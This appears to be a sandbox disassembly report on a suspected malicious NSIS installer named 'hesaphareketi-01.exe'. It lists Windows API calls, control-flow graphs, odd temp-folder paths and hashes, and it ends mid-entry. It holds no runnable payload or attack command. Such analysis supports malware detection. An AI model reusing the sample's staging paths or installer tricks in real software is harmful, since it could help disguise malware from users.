                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$CloseFileFirst
                                                                                      • String ID: C:\
                                                                                      • API String ID: 2295610775-3404278061
                                                                                      • Opcode ID: 09a722932e0a1bea88283b0440f714d8f88131f4b1bd488506181814d844a3ce
                                                                                      • Instruction ID: c6d438537f48b5b2fd9a798109b403d1ef13146c040350fe47557a90c5bdf24f
                                                                                      • Opcode Fuzzy Hash: 09a722932e0a1bea88283b0440f714d8f88131f4b1bd488506181814d844a3ce
                                                                                      • Instruction Fuzzy Hash: E6D012315091206BC6551B387E0C84B7A589F153717258B37B86AF11E4C734CC628698
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • CoCreateInstance.OLE32(004085E8,?,00000001,004085D8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040217D
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Temp\Undige\Chowderheaded\ukyndighed\Asymmetrically, xrefs: 004021BD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateInstance
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\Undige\Chowderheaded\ukyndighed\Asymmetrically
                                                                                      • API String ID: 542301482-481820323
                                                                                      • Opcode ID: a3079df28c9350d7309c2a19df5477558aa8a9c325ce021c01e80fddd7990195
                                                                                      • Instruction ID: 2ba5a37aa1c239f751097cd18d9f1051e5d6a8806e2346af1523e8cbd5355f1b
                                                                                      • Opcode Fuzzy Hash: a3079df28c9350d7309c2a19df5477558aa8a9c325ce021c01e80fddd7990195
                                                                                      • Instruction Fuzzy Hash: 504139B5A00208AFCB10DFE4C988AAEBBB5FF48314F20457AF515EB2D1DB799941CB44
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 00402871
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFindFirst
                                                                                      • String ID:
                                                                                      • API String ID: 1974802433-0
                                                                                      • Opcode ID: d3449d240157211f65d4661233ebdf21600f3235833f1e3ab3d1db94ad861236
                                                                                      • Instruction ID: dc4ef17723f846daade3f6bb5fabbbbae416fabd81b1269148e1e628f00bda2f
                                                                                      • Opcode Fuzzy Hash: d3449d240157211f65d4661233ebdf21600f3235833f1e3ab3d1db94ad861236
                                                                                      • Instruction Fuzzy Hash: 9DF08271A04104EFD710EBA4DD499ADB378EF00324F2105BBF515F61D1D7B44E449B1A
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      [Control-flow graph not reproduced: nodes 190-294, first block 403d3e-403d50; legend: Executed / Not Executed]
                                                                                      APIs
                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D7A
                                                                                      • ShowWindow.USER32(?), ref: 00403D97
                                                                                      • DestroyWindow.USER32 ref: 00403DAB
                                                                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DC7
                                                                                      • GetDlgItem.USER32(?,?), ref: 00403DE8
                                                                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DFC
                                                                                      • IsWindowEnabled.USER32(00000000), ref: 00403E03
                                                                                      • GetDlgItem.USER32(?,00000001), ref: 00403EB1
                                                                                      • GetDlgItem.USER32(?,00000002), ref: 00403EBB
                                                                                      • SetClassLongW.USER32(?,000000F2,?), ref: 00403ED5
                                                                                      • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F26
                                                                                      • GetDlgItem.USER32(?,00000003), ref: 00403FCC
                                                                                      • ShowWindow.USER32(00000000,?), ref: 00403FED
                                                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FFF
                                                                                      • EnableWindow.USER32(?,?), ref: 0040401A
                                                                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404030
                                                                                      • EnableMenuItem.USER32(00000000), ref: 00404037
                                                                                      • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040404F
                                                                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404062
                                                                                      • lstrlenW.KERNEL32(0042D248,?,0042D248,00000000), ref: 0040408C
                                                                                      • SetWindowTextW.USER32(?,0042D248), ref: 004040A0
                                                                                      • ShowWindow.USER32(?,0000000A), ref: 004041D4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                      • String ID:
                                                                                      • API String ID: 3282139019-0
                                                                                      • Opcode ID: e1db8d192186585ff235057a04b2e8ab0b27ba576f51f22eac3cb3cf97519198
                                                                                      • Instruction ID: 2b8d66c2e1a38ac8fa8a62e4dcdff4cf04ad9fa750ea4aef2484392c4ac96c84
                                                                                      • Opcode Fuzzy Hash: e1db8d192186585ff235057a04b2e8ab0b27ba576f51f22eac3cb3cf97519198
                                                                                      • Instruction Fuzzy Hash: 3EC1D2B1600200AFDB216F61ED89E2B3A68FB94706F04057EF641B51F1CB799982DB6D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      [Control-flow graph not reproduced: nodes 295-366, first block 403990-4039a8; legend: Executed / Not Executed]
                                                                                      APIs
                                                                                        • Part of subcall function 0040665C: GetModuleHandleA.KERNEL32(?,00000020,?,004033E5,0000000A), ref: 0040666E
                                                                                        • Part of subcall function 0040665C: GetProcAddress.KERNEL32(00000000,?), ref: 00406689
                                                                                      • lstrcatW.KERNEL32(1033,0042D248), ref: 00403A11
                                                                                      • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\Undige,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A91
                                                                                      • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\Undige,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000), ref: 00403AA4
                                                                                      • GetFileAttributesW.KERNEL32(Call), ref: 00403AAF
                                                                                      • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\Undige), ref: 00403AF8
                                                                                        • Part of subcall function 004061C9: wsprintfW.USER32 ref: 004061D6
                                                                                      • RegisterClassW.USER32(00433E80), ref: 00403B35
                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B4D
                                                                                      • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B82
                                                                                      • ShowWindow.USER32(00000005,00000000), ref: 00403BB8
                                                                                      • GetClassInfoW.USER32(00000000,RichEdit20W,00433E80), ref: 00403BE4
                                                                                      • GetClassInfoW.USER32(00000000,RichEdit,00433E80), ref: 00403BF1
                                                                                      • RegisterClassW.USER32(00433E80), ref: 00403BFA
                                                                                      • DialogBoxParamW.USER32(?,00000000,00403D3E,00000000), ref: 00403C19
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                      • String ID: "C:\Users\user\Desktop\hesaphareketi-01.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Undige$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                      • API String ID: 1975747703-541698870
                                                                                      • Opcode ID: e7c00f06e4642f31e1c1efb09d561718b89698738e495d8fe895af3e5180c348
                                                                                      • Instruction ID: b69a5953a59a380dedfc974e339360e26c19c43312473aa69c5b527d033ca56b
                                                                                      • Opcode Fuzzy Hash: e7c00f06e4642f31e1c1efb09d561718b89698738e495d8fe895af3e5180c348
                                                                                      • Instruction Fuzzy Hash: 7061A8312003006ED320BF669D46F673A6CEB84B5AF40053FF945B62E2DB7DA9418A2D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      control_flow_graph 369 402ec1-402f0f GetTickCount GetModuleFileNameW call 405d74 372 402f11-402f16 369->372 373 402f1b-402f49 call 406282 call 405b9f call 406282 GetFileSize 369->373 374 4030f3-4030f7 372->374 381 403036-403044 call 402e5d 373->381 382 402f4f 373->382 388 403046-403049 381->388 389 403099-40309e 381->389 384 402f54-402f6b 382->384 386 402f6d 384->386 387 402f6f-402f78 call 403315 384->387 386->387 395 4030a0-4030a8 call 402e5d 387->395 396 402f7e-402f85 387->396 391 40304b-403063 call 40332b call 403315 388->391 392 40306d-403097 GlobalAlloc call 40332b call 4030fa 388->392 389->374 391->389 417 403065-40306b 391->417 392->389 415 4030aa-4030bb 392->415 395->389 400 403001-403005 396->400 401 402f87-402f9b call 405d2f 396->401 405 403007-40300e call 402e5d 400->405 406 40300f-403015 400->406 401->406 420 402f9d-402fa4 401->420 405->406 412 403024-40302e 406->412 413 403017-403021 call 40674f 406->413 412->384 416 403034 412->416 413->412 422 4030c3-4030c8 415->422 423 4030bd 415->423 416->381 417->389 417->392 420->406 421 402fa6-402fad 420->421 421->406 425 402faf-402fb6 421->425 426 4030c9-4030cf 422->426 423->422 425->406 427 402fb8-402fbf 425->427 426->426 428 4030d1-4030ec SetFilePointer call 405d2f 426->428 427->406 429 402fc1-402fe1 427->429 432 4030f1 428->432 429->389 431 402fe7-402feb 429->431 433 402ff3-402ffb 431->433 434 402fed-402ff1 431->434 432->374 433->406 435 402ffd-402fff 433->435 434->416 434->433 435->406
                                                                                      APIs
                                                                                      • GetTickCount.KERNEL32 ref: 00402ED2
                                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\hesaphareketi-01.exe,00000400,?,00000006,00000008,0000000A), ref: 00402EEE
                                                                                        • Part of subcall function 00405D74: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\hesaphareketi-01.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D78
                                                                                        • Part of subcall function 00405D74: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D9A
                                                                                      • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\hesaphareketi-01.exe,C:\Users\user\Desktop\hesaphareketi-01.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F3A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                      • String ID: "C:\Users\user\Desktop\hesaphareketi-01.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\hesaphareketi-01.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                      • API String ID: 4283519449-3246505101
                                                                                      • Opcode ID: 63e69acdaec1fdaba5d4a89e2a3b5318abe59b2b0843af0c7679ee6c60d0c948
                                                                                      • Instruction ID: 5fb561c1f1da7fe65fe29aa304fda9dad36d264b5387f138e6185790fd874317
                                                                                      • Opcode Fuzzy Hash: 63e69acdaec1fdaba5d4a89e2a3b5318abe59b2b0843af0c7679ee6c60d0c948
                                                                                      • Instruction Fuzzy Hash: 18510471902216AFDB20AF64DD85B9E7EB8FB00359F15403BF904B62C5C7789E408B6C
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      control_flow_graph 436 4062a4-4062af 437 4062b1-4062c0 436->437 438 4062c2-4062d8 436->438 437->438 439 4064f0-4064f6 438->439 440 4062de-4062eb 438->440 441 4064fc-406507 439->441 442 4062fd-40630a 439->442 440->439 443 4062f1-4062f8 440->443 444 406512-406513 441->444 445 406509-40650d call 406282 441->445 442->441 446 406310-40631c 442->446 443->439 445->444 448 406322-406360 446->448 449 4064dd 446->449 450 406480-406484 448->450 451 406366-406371 448->451 452 4064eb-4064ee 449->452 453 4064df-4064e9 449->453 454 406486-40648c 450->454 455 4064b7-4064bb 450->455 456 406373-406378 451->456 457 40638a 451->457 452->439 453->439 458 40649c-4064a8 call 406282 454->458 459 40648e-40649a call 4061c9 454->459 461 4064ca-4064db lstrlenW 455->461 462 4064bd-4064c5 call 4062a4 455->462 456->457 463 40637a-40637d 456->463 460 406391-406398 457->460 474 4064ad-4064b3 458->474 459->474 466 40639a-40639c 460->466 467 40639d-40639f 460->467 461->439 462->461 463->457 464 40637f-406382 463->464 464->457 470 406384-406388 464->470 466->467 472 4063a1-4063bf call 406150 467->472 473 4063da-4063dd 467->473 470->460 479 4063c4-4063c8 472->479 477 4063ed-4063f0 473->477 478 4063df-4063eb GetSystemDirectoryW 473->478 474->461 476 4064b5 474->476 480 406478-40647e call 406516 476->480 482 4063f2-406400 GetWindowsDirectoryW 477->482 483 40645b-40645d 477->483 481 40645f-406463 478->481 484 406468-40646b 479->484 485 4063ce-4063d5 call 4062a4 479->485 480->461 481->480 487 406465 481->487 482->483 483->481 486 406402-40640c 483->486 484->480 492 40646d-406473 lstrcatW 484->492 485->481 489 406426-40643c SHGetSpecialFolderLocation 486->489 490 40640e-406411 486->490 487->484 495 406457 489->495 496 40643e-406455 SHGetPathFromIDListW CoTaskMemFree 489->496 490->489 494 406413-40641a 490->494 492->480 498 406422-406424 494->498 495->483 496->481 496->495 498->481 498->489
                                                                                      APIs
                                                                                      • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004063E5
                                                                                      • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsj313A.tmp\System.dll,?,0040531D,Skipped: C:\Users\user\AppData\Local\Temp\nsj313A.tmp\System.dll,00000000), ref: 004063F8
                                                                                      • SHGetSpecialFolderLocation.SHELL32(0040531D,0041C000,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsj313A.tmp\System.dll,?,0040531D,Skipped: C:\Users\user\AppData\Local\Temp\nsj313A.tmp\System.dll,00000000), ref: 00406434
                                                                                      • SHGetPathFromIDListW.SHELL32(0041C000,Call), ref: 00406442
                                                                                      • CoTaskMemFree.OLE32(0041C000), ref: 0040644D
                                                                                      • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406473
                                                                                      • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsj313A.tmp\System.dll,?,0040531D,Skipped: C:\Users\user\AppData\Local\Temp\nsj313A.tmp\System.dll,00000000), ref: 004064CB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                      • String ID: ,Dw$Call$Skipped: C:\Users\user\AppData\Local\Temp\nsj313A.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                      • API String ID: 717251189-1621803492
                                                                                      • Opcode ID: 6fc0e9bd201598ebd8c406b108823dc70aeda339606061988c7aa7d82e3f103b
                                                                                      • Instruction ID: 2bc9f3e321a063d065e255e84c3e845f89f4622f689527909a28eedc1d3cb15f
                                                                                      • Opcode Fuzzy Hash: 6fc0e9bd201598ebd8c406b108823dc70aeda339606061988c7aa7d82e3f103b
                                                                                      • Instruction Fuzzy Hash: 1D613631A00205ABDF209F64CD41ABE37A5AF44318F16813FE947B62D1D77C5AA1CB9D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      control_flow_graph 763 40176f-401794 call 402c37 call 405bca 768 401796-40179c call 406282 763->768 769 40179e-4017b0 call 406282 call 405b53 lstrcatW 763->769 775 4017b5-4017b6 call 406516 768->775 769->775 778 4017bb-4017bf 775->778 779 4017c1-4017cb call 4065c5 778->779 780 4017f2-4017f5 778->780 788 4017dd-4017ef 779->788 789 4017cd-4017db CompareFileTime 779->789 782 4017f7-4017f8 call 405d4f 780->782 783 4017fd-401819 call 405d74 780->783 782->783 790 40181b-40181e 783->790 791 40188d-4018b6 call 4052e6 call 4030fa 783->791 788->780 789->788 792 401820-40185e call 406282 * 2 call 4062a4 call 406282 call 4058e4 790->792 793 40186f-401879 call 4052e6 790->793 805 4018b8-4018bc 791->805 806 4018be-4018ca SetFileTime 791->806 792->778 826 401864-401865 792->826 803 401882-401888 793->803 807 402ac8 803->807 805->806 809 4018d0-4018db CloseHandle 805->809 806->809 811 402aca-402ace 807->811 812 4018e1-4018e4 809->812 813 402abf-402ac2 809->813 815 4018e6-4018f7 call 4062a4 lstrcatW 812->815 816 4018f9-4018fc call 4062a4 812->816 813->807 821 401901-4022f6 call 4058e4 815->821 816->821 821->811 826->803 828 401867-401868 826->828 828->793
                                                                                      APIs
                                                                                      • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                                                      • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\Undige\Chowderheaded\ukyndighed\Asymmetrically,?,?,00000031), ref: 004017D5
                                                                                        • Part of subcall function 00406282: lstrcpynW.KERNEL32(?,?,00000400,00403444,Cellulipetally Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 0040628F
                                                                                        • Part of subcall function 004052E6: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsj313A.tmp\System.dll,00000000,0041C000,753823A0,?,?,?,?,?,?,?,?,?,0040325E,00000000,?), ref: 0040531E
                                                                                        • Part of subcall function 004052E6: lstrlenW.KERNEL32(0040325E,Skipped: C:\Users\user\AppData\Local\Temp\nsj313A.tmp\System.dll,00000000,0041C000,753823A0,?,?,?,?,?,?,?,?,?,0040325E,00000000), ref: 0040532E
                                                                                        • Part of subcall function 004052E6: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsj313A.tmp\System.dll,0040325E), ref: 00405341
                                                                                        • Part of subcall function 004052E6: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsj313A.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsj313A.tmp\System.dll), ref: 00405353
                                                                                        • Part of subcall function 004052E6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405379
                                                                                        • Part of subcall function 004052E6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405393
                                                                                        • Part of subcall function 004052E6: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\Undige\Chowderheaded\ukyndighed\Asymmetrically$C:\Users\user\AppData\Local\Temp\nsj313A.tmp$C:\Users\user\AppData\Local\Temp\nsj313A.tmp\System.dll$Call
                                                                                      • API String ID: 1941528284-1781081301
                                                                                      • Opcode ID: 93a8df93a63015aabafb06028bce74f043f93929368c43c52b14b4ab0043bee3
                                                                                      • Instruction ID: 71989b97474780e21d9e3883d12846d469cfbdfaa42366440e3466e884ca0043
                                                                                      • Opcode Fuzzy Hash: 93a8df93a63015aabafb06028bce74f043f93929368c43c52b14b4ab0043bee3
                                                                                      • Instruction Fuzzy Hash: C1419431900518BECF11BBA5DC46DAF3679EF45328F20423FF412B50E1DA3C8A519A6D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      control_flow_graph 829 4052e6-4052fb 830 405301-405312 829->830 831 4053b2-4053b6 829->831 832 405314-405318 call 4062a4 830->832 833 40531d-405329 lstrlenW 830->833 832->833 835 405346-40534a 833->835 836 40532b-40533b lstrlenW 833->836 837 405359-40535d 835->837 838 40534c-405353 SetWindowTextW 835->838 836->831 839 40533d-405341 lstrcatW 836->839 840 4053a3-4053a5 837->840 841 40535f-4053a1 SendMessageW * 3 837->841 838->837 839->835 840->831 842 4053a7-4053aa 840->842 841->840 842->831
                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsj313A.tmp\System.dll,00000000,0041C000,753823A0,?,?,?,?,?,?,?,?,?,0040325E,00000000,?), ref: 0040531E
                                                                                      • lstrlenW.KERNEL32(0040325E,Skipped: C:\Users\user\AppData\Local\Temp\nsj313A.tmp\System.dll,00000000,0041C000,753823A0,?,?,?,?,?,?,?,?,?,0040325E,00000000), ref: 0040532E
                                                                                      • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsj313A.tmp\System.dll,0040325E), ref: 00405341
                                                                                      • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsj313A.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsj313A.tmp\System.dll), ref: 00405353
                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405379
                                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405393
                                                                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                      • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsj313A.tmp\System.dll
                                                                                      • API String ID: 2531174081-3666791398
                                                                                      • Opcode ID: 1a26142181a7b7966a479fe8b98f583e8404c83a3c6630b706bedea1a7a6ef4c
                                                                                      • Instruction ID: 0b7e0c68d9dca976d3f5af37e2abe0e5b3dfc86658143eccbc3f009734cc3570
                                                                                      • Opcode Fuzzy Hash: 1a26142181a7b7966a479fe8b98f583e8404c83a3c6630b706bedea1a7a6ef4c
                                                                                      • Instruction Fuzzy Hash: 3F21A171900518BACF11AFA5DD859CFBFB4EF85350F14817AF944B6290C7B98A90CFA8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: CountTick$wsprintf
                                                                                      • String ID: ... %d%%$FrA$@
                                                                                      • API String ID: 551687249-1685835555
                                                                                      • Opcode ID: bcadc4b8fcc5a9726af7f1001a2bc5a9f2fe7a461361550fb019878be66ece88
                                                                                      • Instruction ID: f75c430432033e5046526aed0a4a2f939c591a2e87bafbbe4e5c1659d7ec9983
                                                                                      • Opcode Fuzzy Hash: bcadc4b8fcc5a9726af7f1001a2bc5a9f2fe7a461361550fb019878be66ece88
                                                                                      • Instruction Fuzzy Hash: 85515A71900219EBDB10CF69DA84B9E7FA8AF45366F14417BEC14B72C0C778DA50CBA9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406603
                                                                                      • wsprintfW.USER32 ref: 0040663E
                                                                                      • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406652
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                      • String ID: %s%S.dll$UXTHEME$\
                                                                                      • API String ID: 2200240437-1946221925
                                                                                      • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                                      • Instruction ID: 71749ee66451d02820e1787a81c679d49f65c12e6a5790e59d0bd58148e6f3af
                                                                                      • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                                      • Instruction Fuzzy Hash: 64F021705001196BCF10AB64DD0DFAB3B5CA700304F10487AA546F11D1EBBDDA65CB98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057F8
                                                                                      • GetLastError.KERNEL32 ref: 0040580C
                                                                                      • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405821
                                                                                      • GetLastError.KERNEL32 ref: 0040582B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                      • String ID: C:\Users\user\Desktop
                                                                                      • API String ID: 3449924974-3443045126
                                                                                      • Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                                      • Instruction ID: 81d47e77b106c5c69b6f53bab6ade4ced08fad65239eb4e1eedbceb886e7a33c
                                                                                      • Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                                      • Instruction Fuzzy Hash: 8C01E5B2C00619DADF009FA1D9487EFBFB8EB14354F00803AD945B6281E7789618CFA9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • GetTickCount.KERNEL32 ref: 00405DC1
                                                                                      • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\hesaphareketi-01.exe",00403371,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75383420,004035BF), ref: 00405DDC
